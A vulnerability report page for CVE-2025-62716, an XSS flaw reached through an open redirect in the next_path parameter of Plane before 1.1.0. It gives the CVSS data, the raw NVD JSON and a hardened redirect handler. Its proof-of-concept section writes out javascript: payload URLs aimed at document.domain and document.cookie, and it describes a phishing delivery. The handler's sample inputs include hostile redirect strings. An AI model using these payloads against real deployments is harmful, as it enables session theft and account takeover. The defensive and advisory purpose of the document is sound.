Security Vulnerability Report
CVE-2025-62716 CVSS 8.1 HIGH

CVE-2025-62716

Published: 2025-10-24 20:17:39
Last Modified: 2026-04-15 00:35:42

Description

Plane is open-source project management software. Prior to version 1.1.0, an open redirect vulnerability in the ?next_path query parameter allows attackers to supply arbitrary schemes (e.g., javascript:) that are passed directly to router.push. This results in a cross-site scripting (XSS) vulnerability, enabling attackers to execute arbitrary JavaScript in the victim's browser. The issue can be exploited without authentication and has severe impact, including information disclosure, privilege escalation, and modification of administrative settings. This issue has been patched in version 1.1.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected versions per the advisory:

Plane < 1.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-62716 PoC - Plane XSS via next_path parameter
// This PoC demonstrates the XSS vulnerability in Plane's next_path parameter

// Malicious URL that exploits the XSS vulnerability
const maliciousUrl = 'http://target-plane.com/auth?next_path=javascript:alert(document.domain)';

// Attack scenario:
// 1. Attacker creates a phishing email or webpage with the malicious URL
// 2. Victim clicks on the link
// 3. Plane processes next_path parameter without validation
// 4. The javascript: protocol handler executes arbitrary JS code

console.log('[*] CVE-2025-62716 PoC');
console.log('[*] Target: Plane < 1.1.0');
console.log('[*] Malicious URL:', maliciousUrl);

// Generate phishing link with URL encoding
const encodedNextPath = encodeURIComponent('javascript:alert(document.cookie)');
const exploitUrl = `http://target-plane.com/auth?next_path=${encodedNextPath}`;
console.log('[*] Encoded exploit URL:', exploitUrl);

// Simulated attack request: extract next_path the way the client would
const parsedUrl = new URL(exploitUrl);
console.log('[*] Extracted next_path value:', parsedUrl.searchParams.get('next_path'));

// This value is passed directly to router.push without validation
// Vulnerable code pattern:
//   const nextPath = new URLSearchParams(window.location.search).get('next_path');
//   router.push(nextPath); // No validation - XSS occurs here
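The following hardened `next_path` handler is an added example; it is not Plane's code and not the fix shipped in 1.1.0. It assumes a hypothetical application origin `https://plane.example` and a Next.js-style `router.push` caller, and it shows the defensive counterpart to the vulnerable pattern above: the query value is treated as untrusted, only same-origin root-relative paths are accepted, and `javascript:` or other scheme-bearing values, absolute URLs, and protocol-relative hosts (`//host`, `/\host`) all fall back to a fixed default.

```javascript
// Added example (not Plane's code): validate a ?next_path value before
// handing it to a client-side router. APP_ORIGIN is a constructed placeholder.
const APP_ORIGIN = 'https://plane.example';
const DEFAULT_PATH = '/';

// Vulnerable pattern described in the advisory, shown for contrast only:
//   const nextPath = new URLSearchParams(window.location.search).get('next_path');
//   router.push(nextPath); // javascript: and cross-origin URLs go straight through

// Hardened form: accept only a same-origin, root-relative path.
function safeNextPath(nextPath, appOrigin = APP_ORIGIN) {
  if (typeof nextPath !== 'string' || nextPath.length === 0) return DEFAULT_PATH;

  // Require exactly one leading slash: this rejects any "scheme:" prefix and
  // the protocol-relative "//host" and backslash "/\host" variants, which the
  // WHATWG parser would otherwise resolve to a foreign host.
  if (!nextPath.startsWith('/') || nextPath.startsWith('//') || nextPath.startsWith('/\\')) {
    return DEFAULT_PATH;
  }

  let parsed;
  try {
    // Resolve against the app origin; anything that changes the origin is rejected.
    parsed = new URL(nextPath, appOrigin);
  } catch {
    return DEFAULT_PATH;
  }
  if (parsed.origin !== appOrigin) return DEFAULT_PATH;

  // Return the normalized relative portion only, never the raw input string.
  return parsed.pathname + parsed.search + parsed.hash;
}

// Drop-in replacement for the query-string extraction step; `search` is
// window.location.search in the browser, passed in here so the logic is testable.
function nextPathFromSearch(search, appOrigin = APP_ORIGIN) {
  const raw = new URLSearchParams(search).get('next_path');
  return safeNextPath(raw, appOrigin);
}

// Constructed sample inputs showing which values survive validation.
const samples = [
  '/workspace/issues?tab=1#c',
  'javascript:alert(document.domain)',
  '//evil.example/login',
  '/\\evil.example',
  'https://evil.example/',
  '/../admin',
];
for (const s of samples) {
  console.log(JSON.stringify(s), '->', safeNextPath(s));
}
```

The caller then does `router.push(nextPathFromSearch(window.location.search))`; because the function never returns the raw parameter, a malformed or hostile value can only ever produce the default path or a normalized same-origin path.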

References

https://github.com/makeplane/plane/security/advisories/GHSA-6fj7-xgpg-mj6f
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62716", "sourceIdentifier": "[email protected]", "published": "2025-10-24T20:17:38.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Plane is open-source project management software. Prior to version 1.1.0, an open redirect vulnerability in the ?next_path query parameter allows attackers to supply arbitrary schemes (e.g., javascript:) that are passed directly to router.push. This results in a cross-site scripting (XSS) vulnerability, enabling attackers to execute arbitrary JavaScript in the victim’s browser. The issue can be exploited without authentication and has severe impact, including information disclosure, and privilege escalation and modifications of administrative settings. This issue has been patched in version 1.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/makeplane/plane/security/advisories/GHSA-6fj7-xgpg-mj6f", "source": "[email protected]"}]}}